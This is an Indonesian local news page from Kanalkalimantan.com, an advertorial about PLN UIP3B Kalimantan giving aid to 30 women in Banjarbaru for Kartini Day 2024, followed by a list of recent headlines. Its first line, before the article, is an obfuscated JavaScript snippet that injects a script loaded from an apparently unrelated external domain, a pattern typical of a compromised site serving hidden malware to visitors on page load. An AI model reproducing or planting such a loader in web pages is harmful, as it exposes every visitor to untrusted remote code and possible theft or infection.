(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PLN UIP3B KALIMANTAN

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan melalui Srikandi PLN dan Yayasan Baitul Maal (YBM) PLN UIP3B Kalimantan memberikan bantuan kepada muslimah tangguh di Kalimantan Selatan, Rabu (24/4/2024).

Santunan ini disalurkan kepada 30 muslimah tangguh di tiga lokasi sekaligus, yakni di Kelurahan Cempaka, Kelurahan Sungai Tiung, dan Kelurahan Bangkal, Kota Banjarbaru.

General Manager UIP3B Kalimantan, Abdul Salam Nganro mengucapkan rasa syukurnya atas kegiatan ini. Dia mengatakan, kegiatan ini sebagai wujud kepedulian PLN kepada warga tangguh khususnya perempuan pada momen peringatan Hari Kartini.

Baca juga: Kafilah HSU Paling Awal Tampil saat Pawai Ta’aruf MTQ

“Di momen peringatan Hari Kartini, kami mengajak masyarakat mewujudkan kualitas keluarga. Terutama pada kaum perempuan yang saat ini menguatkan dirinya untuk menjadi muslimah tangguh,” kata Salam.

Salam juga mengungkapkan, dukungan kepada para muslimah tangguh, tidak hanya memberikan bantuan finansial, tetapi juga memberikan dorongan semangat dan keberanian kepada mereka untuk terus berkarya dan memberikan kontribusi positif bagi keluarga dan masyarakat.

“Program santunan kepada para muslimah tangguh adalah wujud nyata dari komitmen kami untuk mendukung dan menghargai peran mereka dalam masyarakat. Semoga melalui momen ini, dapat menjadi langkah kecil yang membawa keberkahan dan kebahagiaan dalam kehidupan mereka,” ungkap Salam.

Baca juga: Konser Malam Pestaforia Kapuas 2024

Salah satu penerima manfaat, Masniah, tak hentinya mengucapkan rasa terima kasih atas bantuan yang diberikan PLN. Masinah terus mengucap syukur dan mendoakan PLN UIP3B agar semua kebaikan ini diberkati oleh Allah SWT.

“Semoga semacam ini akan terus berlanjut,” ucap Masniah pendek.

Sementara itu, Sekretaris Kelurahan Bangkal, Etty Marnih SE turut menyampaikan rasa terima kasih atas bantuan yang meringankan kebutuhan hidup warga. Menurutnya, bantuan ini mampu memotivasi perempuan lainnya untuk terus tumbuh dan menjadi perempuan tangguh menghadapi kehidupan sekarang.

Baca juga: Waket I DPRD Kapuas Apresiasi Pawai Budaya

“Kami tentunya berharap kegiatan seperti ini akan terus diadakan untuk memberikan manfaat yang berkelanjutan bagi masyarakat. Terima kasih kami ucapkan kepada PLN UIP3B Kalimantan atas kepeduliannya,” tutup Etty.(Kanalkalimantan.com/adv)

Editor : kk


Muhammad Andi

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

2 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

3 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

6 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

7 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

8 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

10 jam ago

This website uses cookies.